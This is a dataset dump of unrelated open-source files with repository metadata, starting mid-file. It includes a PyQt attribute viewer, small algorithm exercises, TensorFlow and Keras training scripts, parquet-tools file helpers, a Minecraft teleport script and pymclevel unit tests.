listWidget.setFixedWidth(300)\n self.setMinimumWidth(200)\n else :\n displayCnt = 25\n listWidget.setFixedWidth(300) # make it wide enough to handle long names\n self.setMinimumWidth(300)\n #listWidget.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)\n \n listWidget.setFixedHeight(displayCnt * itemHeight + 10)\n self.setMinimumHeight(displayCnt * itemHeight + 10)\n \n # end of __init_\n \n \n def doReturn(self) :\n self.done(0) # close\n \n# end of class AttrValueListDialog\n\n\nclass AttributeDelegate(QtWidgets.QStyledItemDelegate) :\n\n def __init__(self, parent) :\n super(AttributeDelegate, self).__init__(parent)\n self.parent = parent\n\n def createEditor(self, parent, option, index) :\n dat = index.data()\n if index.column() == 0 :\n pass\n elif index.column() == 1 and dat and len(dat) > 20 :\n editor = LinePlainTextEdit(parent)\n editor.editFinished.connect(self.commitAndCloseEditor)\n editor.setMinimumHeight(100)\n return editor\n else :\n return super(AttributeDelegate, self).createEditor(parent, option, index)\n\n def setEditorData(self, editor, index) :\n if index.column() == 1 and len(index.data()) > 20 :\n editor.setPlainText(index.data())\n else :\n super(AttributeDelegate, self).setEditorData(editor, index)\n\n def setModelData(self, editor, model, index) :\n if index.column() == 1 and index.data and len(index.data()) > 20 :\n model.setData(index, editor.toPlainText(), QtCore.Qt.EditRole)\n else :\n super(AttributeDelegate, self).setModelData(editor, model, index)\n\n def commitAndCloseEditor(self) :\n editor = self.sender()\n self.commitData.emit(editor)\n self.closeEditor.emit(editor)\n \n#end of class AttributeDelegate\n\n\nclass Attribute(object) :\n\n def __init__(self, name, getter, setter, isTree = False, fileLoc = None, extraPath = None, listPopup = False, *params) :\n self.name = name\n self.setter = setter\n self.getter = getter\n self.params = params\n self.isTree = isTree # debugging\n self.tree = params[0] if isTree else None # an AttribModel, if this has an embedded tree\n if fileLoc and extraPath:\n fileLocFile = os.path.join(extraPath, fileLoc[0]) # make file path relative to GDX file\n fileLoc = (fileLocFile, fileLoc[1])\n self.fileLoc = fileLoc\n self.doesListPopup = listPopup\n \n def child(self, row) :\n if self.tree :\n return self.tree.child(row)\n return None\n\n def childNumber(self, row) :\n if self.tree :\n return self.tree.rowCount(None)\n return 0\n\n def getData(self, column) :\n if column == 0 :\n return self.name\n elif column == 1 and self.getter :\n return self.getter(*self.params)\n return None\n\n def setData(self, column, value) :\n if column == 0 and value:\n self.name = value\n return True\n elif column == 1 and self.setter:\n params = list(self.params[:]) + [value]\n self.setter(*params)\n return True\n return False\n\n def isEditable(self, column) :\n if self.setter : return True\n return False\n \n def getFileLoc(self, treePath) :\n if self.fileLoc :\n return self.fileLoc\n elif self.tree :\n return self.tree.fileLocAt(treePath) # tree is an AttribModel\n else :\n return None\n \n def listForPopup(self) :\n if self.doesListPopup :\n classListStr = self.getData(1)\n # turn into list\n res = classListStr.split(' ') # two spaces\n res.sort()\n return res\n else :\n return None\n \n def showPopupList(self, listToShow, widget) :\n dialog = AttrValueListDialog(widget, self.name, listToShow)\n dialog.show() # modeless\n\n \n def debugPrintData(self) :\n print(self.name)\n if self.isTree : \n print(\">>>\")\n 
self.tree.debugPrintData()\n print(\"<<<\")\n\n# end of class Attribute\n\n\n# An AttribModel consists of a list of Attributes, corresponding to a row in the AttribView control.\n# An Attribute can be a sub-tree which in turn contains an AttribModel with the list of sub-items.\n\nclass AttribModel(QtCore.QAbstractItemModel) :\n\n def __init__(self, data, parent = None, root = None) : # data is a list of Attributes\n super(AttribModel, self).__init__(parent)\n self.__data = data\n self.__root = root if root else self\n self.__parent = parent\n \n def add(self, data) :\n self.__data.append(data)\n\n def rowCount(self, parent) :\n if not parent or not parent.isValid() :\n return len(self.__data)\n else :\n pitem = self.getItem(parent)\n return pitem.__data[parent.row()].childNumber(parent.row())\n\n def columnCount(self, parent) :\n return 2\n\n def data(self, index, role) :\n if not index.isValid() or (role != QtCore.Qt.DisplayRole and role != QtCore.Qt.EditRole) :\n return None\n\n item = self.getItem(index)\n dat = item.__data[index.row()]\n return dat.getData(index.column())\n\n def flags(self, index) :\n res = QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable\n if index and index.isValid() :\n item = self.getItem(index)\n dat = item.__data[index.row()]\n if dat.isEditable(index.column()) :\n res |= QtCore.Qt.ItemIsEditable\n return res\n\n def child(self, num) :\n return self.__data[num]\n\n def getChildRow(self, model) :\n for i, d in enumerate(self.__data) :\n if len(d.params) and d.params[0] == model :\n return i\n return -1\n \n def parent(self, index) :\n if index and index.isValid() :\n child = self.getItem(index)\n parent = child.__parent\n if parent :\n row = parent.getChildRow(child)\n if row >= 0 :\n return parent.createIndex(row, 0, parent)\n return QtCore.QModelIndex()\n\n def getItem(self, index) :\n if index and index.isValid() :\n item = index.internalPointer()\n if item : return item\n return self\n\n def index(self, row, column, parent = None) :\n if not parent or not parent.isValid() :\n return self.createIndex(row, column, self.__root)\n else :\n parentModel = self.getItem(parent)\n parentItem = parentModel.__data[parent.row()]\n if parentItem.tree :\n return self.createIndex(row, column, parentItem.tree)\n return QtCore.QModelIndex()\n\n def setData(self, index, value, role) :\n if role != QtCore.Qt.EditRole:\n return False\n item = self.getItem(index)\n attrib = item.__data[index.row()]\n res = attrib.setData(index.column(), value)\n if res :\n self.__root.dataChanged.emit(index, index)\n return res\n \n def fileLocAt(self, treePath) :\n i = treePath[0]\n attrData = self.__data[i]\n return attrData.getFileLoc(treePath[1:])\n \n def listForPopup(self, treePath) :\n i = treePath[0]\n attrData = self.__data[i]\n return attrData.listForPopup()\n \n def showPopupList(self, treePath, listToShow, widget) :\n i = treePath[0]\n attrData = self.__data[i]\n return attrData.showPopupList(listToShow, widget) \n\n def debugPrintData(self) :\n print(self.__data)\n for d in self.__data :\n d.debugPrintData()\n\n# end of class AttribModel\n \n\nclass AttribView(QtWidgets.QTreeView) :\n\n def __init__(self, app, parent = None) :\n super(AttribView, self).__init__(parent)\n self.app = app\n self.header().setStretchLastSection(True)\n self.header().setSectionResizeMode(QtWidgets.QHeaderView.ResizeToContents)\n self.header().hide()\n self.attribDelegate = AttributeDelegate(self)\n #self.setItemDelegateForColumn(1, self.attribDelegate)\n\n @QtCore.Slot(DataObj, ModelSuper)\n def 
changeData(self, data, modelBogus) : # data is a Slot, GraideGlyph, etc.; modelBogus is eg RunView\n self.data = data\n self.model = data.attribModel() if data else None\n self.setModel(self.model)\n self.expandAll()\n \n def dataObject(self) :\n try :\n return self.data\n except :\n return None\n\n def removeCurrent(self) :\n index = self.currentIndex()\n self.model.setData(index, None, QtCore.Qt.EditRole)\n \n def mouseDoubleClickEvent(self, event) :\n #print(\"mouseDoubleClickEvent\")\n super(AttribView, self).mouseDoubleClickEvent(event)\n \n # Generate a path to where the click was in the tree control.\n row = self.currentIndex().row()\n parentIndex = self.currentIndex().parent()\n treePath = [row]\n while parentIndex.row() > -1 :\n treePath.insert(0, parentIndex.row()) # prepend\n parentIndex = parentIndex.parent()\n \n pList = self.model.listForPopup(treePath)\n if pList :\n self.model.showPopupList(treePath, pList, self)\n else :\n fileLoc = self.model.fileLocAt(treePath)\n if fileLoc : \n self.app.selectLine(*fileLoc)\n\n def findMainFileLoc(self) :\n treePath = [0] # for Glyph tab, assumes glyph number is the first\n fileLoc = self.model.fileLocAt(treePath)\n if fileLoc :\n self.app.selectLine(*fileLoc)\n \n# end of class AttribView\n\n\nif __name__ == '__main__' :\n\n from graide.font import GraideFont\n import sys, os\n \n app = QtWidgets.QApplication(sys.argv)\n font = GraideFont()\n tpath = os.path.join(os.path.dirname(sys.argv[0]), '../../tests/fonts/Padauk')\n font.loadFont(os.path.join(tpath, 'Padauk.ttf'), os.path.join(tpath, 'padauk.xml'))\n glyph = font.psnames['u1000']\n model = glyph.attribModel()\n view = AttribView(model)\n view.show()\n sys.exit(app.exec_())\n\n","repo_name":"silnrsi/graide","sub_path":"lib/graide/attribview.py","file_name":"attribview.py","file_ext":"py","file_size_in_byte":13158,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"96"} +{"seq_id":"30122426228","text":"def no_ones(number: int) -> int:\n \"\"\"\n nr: 101010\n nr - 1: 101001\n\n nr & (nr - 1) == 101000\n \"\"\"\n\n ones = 0\n\n while number:\n ones += 1\n number = number & (number - 1)\n\n return ones\n\n\ndef solve_ok(number: int) -> int:\n \"\"\" O(k) complexity, where k == no ones \"\"\"\n return no_ones(number) % 2\n\n\ndef solve_efficient(number: int) -> int:\n number ^= number >> 32\n number ^= number >> 16\n number ^= number >> 8\n number ^= number >> 4\n number ^= number >> 2\n number ^= number >> 1\n return number & 1\n\n\nfor solve in [solve_ok, solve_efficient]:\n print(f\"Using {solve.__name__}\")\n\n for (use_case, expected_result) in [\n (int('101010101', 2), 1),\n (int('101010100', 2), 0),\n (int('0', 2), 0),\n (int('1', 2), 1),\n ]:\n result = solve(use_case)\n assert result == expected_result, \\\n f\"Invalid parity {result} for {use_case}, expected {expected_result}\"\n","repo_name":"vtemian/interviews-prep","sub_path":"elements-of-programming-interviews/5.1-parity.py","file_name":"5.1-parity.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"96"} +{"seq_id":"74991847676","text":"import tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix\nimport seaborn as sns\nimport numpy as np\n\nimport model as m\nimport cleanup_preprocessing as p\n\n# --------------------------------- Build model ---------------------------------\nmodel = m.cnn_model(input_shape=(68, 68, 3))\nmodel.summary()\n\n# 
--------------------------------- Train model ---------------------------------\nprint(\"\\nTraining model...\")\nmodel.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=1e-3), # OG: 1e-4\n loss='categorical_crossentropy',\n metrics=['accuracy', tf.keras.metrics.Precision(), tf.keras.metrics.Recall(), tf.keras.metrics.AUC()])\n\nval_preds = model.predict(p.train_images)\n\nhistory = model.fit(p.x_train_augmented,\n validation_data=[p.val_images, p.val_labels],\n epochs=20,\n verbose=1,\n class_weight=p.class_weights_dict\n )\nprint(\"Training done!\\n\")\n\n# --------------------------------- Evaluate model ---------------------------------\nprint(\"Performing test..\")\nresults = model.evaluate(x=p.val_images, y=p.val_labels)\n\nfor i, metric in enumerate(model.metrics_names):\n print('Final validation {}: {}'.format(metric, results[i]))\n\n# --------------------------------- Plot confusion matrix ---------------------------------\nval_pred = np.argmax(val_preds, axis=1)\nval_true = np.argmax(p.train_labels, axis=1)\n\ncm = confusion_matrix(val_true, val_pred)\ncm = cm / cm.astype(float).sum(axis=1)[:, np.newaxis]\n\nfigure = plt.figure(figsize=(8, 8))\nsns.heatmap(cm,\n annot=True,\n cmap=plt.cm.Blues,\n xticklabels=p.label_dict.keys(),\n yticklabels=p.label_dict.keys())\nplt.tight_layout()\nplt.ylabel('True label')\nplt.xlabel('Predicted label')\nplt.show()\n","repo_name":"Berkanktk/SE05-DL","sub_path":"Assignment02/src/train-and-test.py","file_name":"train-and-test.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"22269458060","text":"from threading import Condition\n\nclass BoundedBlockingQueue(object):\n\n def __init__(self, capacity: int):\n self.queue = [None for i in range(capacity)]\n self.capacity = capacity\n self.head = 0\n self.tail = 0\n self.qsize = 0\n self.condition = Condition()\n\n def enqueue(self, element: int) -> None:\n # with self.lock is equivalent to acquiring a lock at start of with block \n # and releasing it at the end of with block\n with self.condition:\n while self.qsize >= self.capacity:\n self.condition.wait()\n\n if self.tail == self.capacity:\n self.tail = 0\n self.queue[self.tail] = element\n self.tail += 1\n self.qsize += 1\n self.condition.notify_all()\n\n\n def dequeue(self) -> int:\n with self.condition:\n while self.qsize == 0:\n self.condition.wait()\n\n if self.head == self.capacity:\n self.head = 0\n ans = self.queue[self.head]\n self.head += 1\n self.qsize -= 1\n self.condition.notify_all()\n return ans\n\n def size(self):\n return self.qsize\n\n","repo_name":"chetan8888/dsa-templates","sub_path":"bounded_queue_multithreading.py","file_name":"bounded_queue_multithreading.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"177545239","text":"import os, sys # A system-specific prefix, for working between linux and windows\nprefix = 'C:/' if os.name == 'nt' else '/home/leandro/'\nsys.path.append(os.path.join(prefix, 'gitRepos/bimvee')) # A path to this library\nname = 'parking1'\n\n#%%\nfrom bimvee.importRpgDvsRos import importRpgDvsRos\nfrom bimvee.split import cropTime\nfilePathOrName = os.path.join(prefix, 'data/ETH_HDR/'+name+'/'+name+'.bag')\n#inspected = importRpgDvsRos(filePathOrName=filePathOrName)\n\ntemplate = {\n 'ch0': {\n 'dvs': '/dvs/cam1/events'\n }\n }\n\n#imported = importRpgDvsRos(filePathOrName=filePathOrName, 
template=template)\n\n \n#%%\n\nimported = cropTime(importRpgDvsRos(filePathOrName=filePathOrName, \n template=template),\n startTime = 16,\n stopTime = 24)\n\n\n#imported['data'] = imported['data'].pop('ch0')\n#%% Choose to export only specific datatypes; \n# overwrite data if the export is already there\n\nfrom bimvee.exportIitYarp import exportIitYarp\n\nexportIitYarp(imported,\n exportFilePath = prefix+'data/ETH_HDR/'+name+'/'+name,\n pathForPlayback = prefix+'data/ETH_HDR/'+name+'/'+name,\n dataTypes = ['dvs'],\n protectedWrite = False)\n","repo_name":"event-driven-robotics/high-throughput-convolutions","sub_path":"src/python/ros2yarp.py","file_name":"ros2yarp.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"13794742233","text":"from mcpi.minecraft import Minecraft\n\nmc = Minecraft.create()\n\n# level = world\n# # # # # # # #\n# home\nSonarNeedle = mc.getPlayerEntityId(\"SonarNeedle\")\nmc.entity.setPos(SonarNeedle,-200.32,33.0,-370.72)\n\n# lava home\nSirleech = mc.getPlayerEntityId(\"sirleech\")\nmc.entity.setPos(Sirleech,-157.824659,35.0,-372.25975)\n","repo_name":"sirleech/minecraft-python-scripts","sub_path":"TakeMeHome.py","file_name":"TakeMeHome.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"10617031789","text":"import tensorflow as tf\nimport matplotlib.pyplot as plt #we will use it to draw the learning curve after training the network\n\ntrain_x = [[0.0, 0.0], [0.0, 1.0], [1.0, 0.0], [1.0, 1.0]]\ntrain_y = [[0], [1], [1], [0]]\n\nINPUT_NEURONS = 2\nHIDDEN_NEURONS = 3\nOUTPUT_NEURONS = 1\n\nNUM_OF_EPOCHS = 100000\n\n\"\"\"(tf.float32, [None, 2]) specifies the datatype and the dimensions of the data.\n#Since we don't know the number of the training data, we make it None which means it accepts any from the user.\n#2 specifies that we have 2 input bits\n\"\"\"\nx = tf.placeholder(tf.float32, [None, 2])\ny_target = tf.placeholder(tf.float32, [None, 1])\n\n\"\"\"\n1- Create the Input-to-hidden weights and bias matrices from the given figure.\nThey should be Variable datatype because they will be changed during the learning process\n\"\"\"\ninput_hidden_weights = tf.Variable([[-0.99, 1.05, .19], [-0.43, -0.44, -0.30]]) #Init. 
from the given network\ninput_hidden_bias = tf.Variable(tf.ones([HIDDEN_NEURONS])) # The bias is one for each hidden neuron\n\n\"\"\"\n2- Get the values of the hidden layer by multiplying the features with the weight matrix [Input to Hidden feedforward]\nApply the hidden layer activation to the multiplication result\n\"\"\"\nhidden_neurons_values = tf.matmul(x, input_hidden_weights) + input_hidden_bias\nhidden_activation_result = tf.nn.sigmoid(hidden_neurons_values)\n\n\"\"\"\n3- Create the hidden-to-output weights and bias matrices from the given figure.\nThey should be Variable datatype because they will be changed during the learning process\n\"\"\"\n\nhidden_output_weights = tf.Variable([[0.18], [1.11], [-0.26]])\nhidden_output_bias = tf.Variable(tf.ones([1]))\n\n\"\"\"\n4- Get the values of the output layer by multiplying the hidden layer with the weight matrix [Hidden to Output feedforward]\nApply the output layer activation to the multiplication result\n\"\"\"\n\nhidden_output_value = tf.matmul(hidden_activation_result, hidden_output_weights) + hidden_output_bias\ny_estimated = tf.nn.sigmoid(hidden_output_value)\n\n\n\"\"\"\n5- Calculate the mean squared error given your prediction and the actual output\n\"\"\"\n\nmean_squared_error = 0.5 * tf.reduce_sum((tf.square(y_estimated - y_target)))\n\ntrain = tf.train.GradientDescentOptimizer(0.1).minimize(mean_squared_error)\n\n\n\"\"\"\nInitiate a Tensorflow graph and session variables\n\"\"\"\nsession = tf.Session()\nsession.run(tf.initialize_all_variables())\n\nerrors = []\nepochs = []\n\nfor i in range(0, NUM_OF_EPOCHS):\n session.run(train, feed_dict={x: train_x, y_target: train_y})\n\n if i % 10 == 0:\n print(\"Iteration number: \", i, \"\\n\")\n error = session.run(mean_squared_error, feed_dict={x: train_x, y_target: train_y})\n print(\"Cost: \", error, \"\\n\")\n errors.append(error)\n epochs.append(i)\n\n if error < 0.01:\n print(\"Input to hidden Weights\",\n session.run(input_hidden_weights, feed_dict={x: train_x, y_target: train_y}))\n print(\"Input to hidden bias\",\n session.run(input_hidden_bias, feed_dict={x: train_x, y_target: train_y}))\n print(\"Hidden to output weight\",\n session.run(hidden_output_weights, feed_dict={x: train_x, y_target: train_y}))\n print(\"Hidden to output bias\",\n session.run(hidden_output_bias, feed_dict={x: train_x, y_target: train_y}))\n\n plt.title(\"Learning Curve using mean squared error cost function\")\n print(\"Cost: \", error, \"\\n\")\n plt.xlabel(\"Number of Epochs\")\n plt.ylabel(\"Cost\")\n plt.plot(epochs, errors)\n plt.show()\n\n break","repo_name":"AhmedHani/FCIS-Machine-Learning-2017","sub_path":"Session4/Practical/Solution/XOR/xor_nn.py","file_name":"xor_nn.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"96"} +{"seq_id":"4400121725","text":"import glob\nfrom abc import ABC, abstractmethod\nfrom contextlib import ExitStack, contextmanager\nfrom dataclasses import dataclass\nfrom functools import reduce\nfrom logging import getLogger\nfrom pathlib import Path\nfrom sys import stderr\nfrom tempfile import TemporaryDirectory\nfrom typing import Iterator, List, Optional, Union\nfrom urllib.parse import urlparse\nfrom uuid import uuid4\n\nimport boto3\nimport pandas as pd\nimport pyarrow.parquet as pq\nfrom pyarrow import lib as pyarrowlib\nfrom halo import Halo\n\nlogger = getLogger(__name__)\n\n\nclass InvalidCommandExcpetion(Exception):\n '''Exception for invalid command. 
Argment parser raises this Exception.\n '''\n pass\n\n\nclass FileNotFoundException(Exception):\n pass\n\n\nclass ParquetFile(ABC):\n '''Abstract ParquetFile.\n One object does not correspond one parquet file but one expression about file\n such as ./target.parquet, ./*.parquet, s3://bucket/foo.parquet or s3://bucket/*\n '''\n\n def __post_init__(self):\n self.validation()\n\n def validation(self) -> None:\n '''validate properties\n '''\n pass\n\n @abstractmethod\n def is_wildcard(self) -> bool:\n '''Return if this object correspond one or more object.\n '''\n raise NotImplementedError()\n\n @abstractmethod\n def resolve_wildcard(self) -> List['ParquetFile']:\n '''Return concrete Parquert file objects.\n '''\n raise NotImplementedError()\n\n @contextmanager\n @abstractmethod\n def get_local_path(self) -> Iterator[str]:\n '''Return local file path.\n If call this function of S3ParquetFile, return the path of downloaded file.\n '''\n raise NotImplementedError()\n\n @contextmanager\n def get_dataframe(self) -> pd.DataFrame:\n with self.get_local_path() as local_path:\n try:\n yield pq.read_table(local_path).to_pandas()\n except pyarrowlib.ArrowInvalid:\n print(f\"File({local_path}) cannot be read as parquet.\", file=stderr)\n yield None\n\n\n@dataclass\nclass LocalParquetFile(ParquetFile):\n '''Parquet file object on local disk\n '''\n path: str\n\n def is_wildcard(self) -> bool:\n return '*' in self.path\n\n def resolve_wildcard(self) -> List[ParquetFile]:\n return sorted(\n [LocalParquetFile(f) for f in glob.glob(self.path)],\n key=lambda x: x.path\n )\n\n @contextmanager\n def get_local_path(self) -> Iterator[str]:\n if self.is_wildcard():\n raise Exception('Please resolve first.')\n if not Path(self.path).exists():\n raise FileNotFoundException(f'File({self.path}) not found')\n yield self.path\n\n\n@dataclass\nclass S3ParquetFile(ParquetFile):\n '''Parquet file object on S3\n '''\n aws_session: boto3.Session\n bucket: str\n key: str\n endpoint_url: Optional[str] = None\n\n def validation(self):\n ''' key can have *. 
But it must be last of the string.\n '''\n if self.is_wildcard() and not self.key.index('*') in (-1, len(self.key) - 1):\n raise InvalidCommandExcpetion('You can use * only end of the path')\n\n def is_wildcard(self) -> bool:\n return '*' in self.key\n\n def resolve_wildcard(self) -> List[ParquetFile]:\n list_res = self.aws_session.client('s3', endpoint_url=self.endpoint_url)\\\n .list_objects_v2(\n Bucket=self.bucket,\n Prefix=self.key[:-1] # remove *\n )\n if list_res['IsTruncated']:\n raise Exception(f'Too much file match s3://{self.bucket}/{self.key}')\n\n if list_res['KeyCount'] == 0:\n return []\n keys = [e['Key'] for e in list_res['Contents']]\n return sorted(\n [S3ParquetFile(aws_session=self.aws_session, bucket=self.bucket, key=key, endpoint_url=self.endpoint_url) for key in keys],\n key=lambda x: x.key\n )\n\n @contextmanager\n def get_local_path(self) -> Iterator[str]:\n if self.is_wildcard():\n raise Exception('Please resolve first.')\n with TemporaryDirectory() as tmp_path:\n localfile = f'{tmp_path}/{uuid4()}.parquet'\n logger.info(f'Download stat parquet file on s3://{self.bucket}/{self.key} -> {localfile}')\n try:\n with Halo(text='Downloading from s3', spinner='dots', stream=stderr) as spinner:\n self.aws_session.resource('s3', endpoint_url=self.endpoint_url)\\\n .meta.client.download_file(self.bucket, self.key, localfile)\n spinner.info(f's3://{self.bucket}/{self.key} => {localfile}')\n except Exception:\n raise FileNotFoundException(f's3://{self.bucket}/{self.key} not found or cannot access')\n else:\n yield localfile\n\n\ndef get_aws_session(profile_name: Optional[str]) -> boto3.Session:\n return boto3.Session(profile_name=profile_name)\n\n\ndef _is_s3_file(filename: str) -> bool:\n return filename[:5] == 's3://'\n\n\ndef to_parquet_file(file_exp: str, awsprofile: Optional[str], endpoint_url: Optional[str]) -> ParquetFile:\n '''Transform file_exp to ParquetFile object.\n '''\n if _is_s3_file(file_exp):\n parsed_url = urlparse(file_exp)\n return S3ParquetFile(\n aws_session=get_aws_session(awsprofile),\n bucket=parsed_url.netloc,\n key=parsed_url.path[1:],\n endpoint_url=endpoint_url\n )\n else:\n return LocalParquetFile(\n path=file_exp\n )\n\n\n@contextmanager\ndef get_datafame_from_objs(objs: List[ParquetFile], head: Union[int, float] = None):\n '''Get pandas dataframe of ParquetFile object list.\n '''\n\n if head is None or head <= 0:\n head = float('inf')\n\n cumsum_row: int = 0\n dfs: List[pd.DataFrame] = []\n with ExitStack() as stack:\n for obj in objs:\n for pf in _resolve_wildcard(obj):\n df: Optional[pd.DataFrame] = stack.enter_context(pf.get_dataframe())\n if df is None:\n continue\n cumsum_row += len(df)\n dfs.append(df)\n\n if cumsum_row >= head:\n break\n if cumsum_row >= head:\n break\n if dfs:\n yield reduce(lambda x, y: pd.concat([x, y]), dfs)\n else:\n yield None\n\n\ndef _resolve_wildcard(obj: ParquetFile) -> List[ParquetFile]:\n if not obj.is_wildcard():\n return [obj]\n else:\n return obj.resolve_wildcard()\n","repo_name":"ktrueda/parquet-tools","sub_path":"parquet_tools/commands/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6548,"program_lang":"python","lang":"en","doc_type":"code","stars":131,"dataset":"github-code","pt":"96"} +{"seq_id":"74475119354","text":"from ..lang import *\n\n\ndef test_defs_folder():\n assert DEFS_FOLDER.endswith('/.langtool')\n\n\nSAMPLE_LANG = '''\n{\n \"vowels\": \"aeiou\",\n \"consonants\": \"stpnmfhzdb\",\n \"sylpats\": [\"CV\", \"CCV\", \"CVC\", \"VC\", \"V\"]\n}\n'''\n\ndef test_syllables():\n 
l = Lang('foo', SAMPLE_LANG)\n for s in l.syllables:\n print(s)","repo_name":"dhh1128/langtool","sub_path":"langtool/tests/lang_test.py","file_name":"lang_test.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"24840969040","text":"#\n# @lc app=leetcode id=164 lang=python3\n#\n# [164] Maximum Gap\n#\n\n\nclass Solution:\n\n def maximumGap(self, nums: List[int]) -> int:\n if len(nums) < 2:\n return 0\n nums = sorted(nums)\n maximum = 0\n for i in range(len(nums)):\n maximum = max(maximum, nums[i]-nums[i-1])\n # print(start, end)\n return maximum\n","repo_name":"gusibi/leetcode","sub_path":"codes/164.maximum-gap.py","file_name":"164.maximum-gap.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"24976063434","text":"'''\nCreated on Jul 23, 2011\n\n@author: Rio\n'''\n#from mclevel import fromFile, loadWorldNumber, BoundingBox\n#from infiniteworld import MCInfdevOldLevel\n#from schematic import MCSchematic\nfrom pymclevel import *\n\nimport itertools\nimport traceback\nimport unittest\nimport tempfile\nimport logging\nimport shutil\nimport os\nimport numpy\nfrom numpy import *\nfrom logging import info\n#logging.basicConfig(format=u'%(levelname)s:%(message)s')\n#logging.getLogger().level = logging.INFO\n\nclass TempLevel(object):\n def __init__(self, filename):\n if not os.path.exists(filename):\n filename = os.path.join(\"testfiles\", filename)\n#def tempCopy(filename):\n if os.path.isdir(filename):\n tmpname = tempfile.mkdtemp(os.path.basename(filename))\n os.rmdir(tmpname)\n shutil.copytree(filename, tmpname)\n else:\n fd, tmpname = tempfile.mkstemp(os.path.basename(filename))\n os.close(fd)\n os.unlink(tmpname)\n shutil.copy(filename, tmpname)\n\n self.tmpname = tmpname\n self.level = fromFile(tmpname)\n\n#def tempRemove(filename):\n def __del__(self):\n self.level.close()\n del self.level\n filename = self.tmpname\n\n if os.path.isdir(filename):\n shutil.rmtree(filename)\n else:\n os.unlink(filename)\n\nclass TestIndevLevel(unittest.TestCase):\n def setUp(self):\n self.srclevel = TempLevel(\"hell.mclevel\")\n self.indevlevel = TempLevel(\"hueg.mclevel\")\n\n def testEntities(self):\n level = self.indevlevel.level\n entityTag = Entity.Create(\"Zombie\")\n tileEntityTag = TileEntity.Create(\"Painting\")\n level.addEntity(entityTag)\n level.addTileEntity(tileEntityTag)\n schem = level.extractSchematic(level.bounds)\n level.copyBlocksFrom(schem, schem.bounds, (0, 0, 0))\n\n #raise Failure \n\n def testCopy(self):\n info(\"Indev level\")\n indevlevel = self.indevlevel.level\n srclevel = self.srclevel.level\n indevlevel.copyBlocksFrom(srclevel, BoundingBox((0, 0, 0), (64, 64, 64,)), (0, 0, 0))\n assert((indevlevel.Blocks[0:64, 0:64, 0:64] == srclevel.Blocks[0:64, 0:64, 0:64]).all())\n\n def testFill(self):\n indevlevel = self.indevlevel.level\n indevlevel.fillBlocks(BoundingBox((0, 0, 0), (64, 64, 64,)), indevlevel.materials.Sand, [indevlevel.materials.Rock, indevlevel.materials.Dirt])\n indevlevel.saveInPlace()\n\n\nclass TestJavaLevel(unittest.TestCase):\n def setUp(self):\n self.creativelevel = TempLevel(\"Dojo_64_64_128.dat\")\n self.indevlevel = TempLevel(\"hell.mclevel\")\n\n def testCopy(self):\n indevlevel = self.indevlevel.level\n creativelevel = self.creativelevel.level\n\n creativelevel.copyBlocksFrom(indevlevel, BoundingBox((0, 0, 0), (64, 64, 64,)), (0, 0, 0))\n 
assert(numpy.array((indevlevel.Blocks[0:64, 0:64, 0:64]) == (creativelevel.Blocks[0:64, 0:64, 0:64])).all())\n\n creativelevel.saveInPlace()\n #xxx old survival levels\n\n\nclass TestAlphaLevelCreate(unittest.TestCase):\n def testCreate(self):\n temppath = tempfile.mktemp(\"AlphaCreate\")\n self.alphaLevel = MCInfdevOldLevel(filename=temppath, create=True);\n\nclass TestAlphaLevel(unittest.TestCase):\n def setUp(self):\n #self.alphaLevel = TempLevel(\"Dojo_64_64_128.dat\")\n self.indevlevel = TempLevel(\"hell.mclevel\")\n self.alphalevel = TempLevel(\"PyTestWorld\")\n\n\n def testCreateChunks(self):\n indevlevel = self.indevlevel.level\n level = self.alphalevel.level\n\n for ch in list(level.allChunks): level.deleteChunk(*ch)\n level.createChunksInBox(BoundingBox((0, 0, 0), (32, 0, 32)))\n\n def testCopyConvertBlocks(self):\n indevlevel = self.indevlevel.level\n level = self.alphalevel.level\n level.copyBlocksFrom(indevlevel, BoundingBox((0, 0, 0), (256, 128, 256)), (-0, 0, 0))\n\n convertedSourceBlocks, convertedSourceData = indevlevel.convertBlocksFromLevel(level, indevlevel.Blocks[0:16, 0:16, 0:indevlevel.Height], indevlevel.Data[0:16, 0:16, 0:indevlevel.Height])\n assert (level.getChunk(0, 0).Blocks[0:16, 0:16, 0:indevlevel.Height] == convertedSourceBlocks).all()\n\n def testImportSchematic(self):\n indevlevel = self.indevlevel.level\n level = self.alphalevel.level\n\n schem = fromFile(\"schematics\\\\CreativeInABox.schematic\");\n level.copyBlocksFrom(schem, BoundingBox((0, 0, 0), (1, 1, 3)), (0, 64, 0));\n schem = MCSchematic(shape=(1, 1, 3))\n schem.copyBlocksFrom(level, BoundingBox((0, 64, 0), (1, 1, 3)), (0, 0, 0));\n convertedSourceBlocks, convertedSourceData = schem.convertBlocksFromLevel(level, schem.Blocks, schem.Data)\n assert (level.getChunk(0, 0).Blocks[0:1, 0:3, 64:65] == convertedSourceBlocks).all()\n\n def testRecreateChunks(self):\n level = self.alphalevel.level\n\n for x, z in itertools.product(xrange(-1, 3), xrange(-1, 2)):\n level.deleteChunk(x, z);\n level.createChunk(x, z)\n\n def testFill(self):\n level = self.alphalevel.level\n\n level.fillBlocks(BoundingBox((-11, 0, 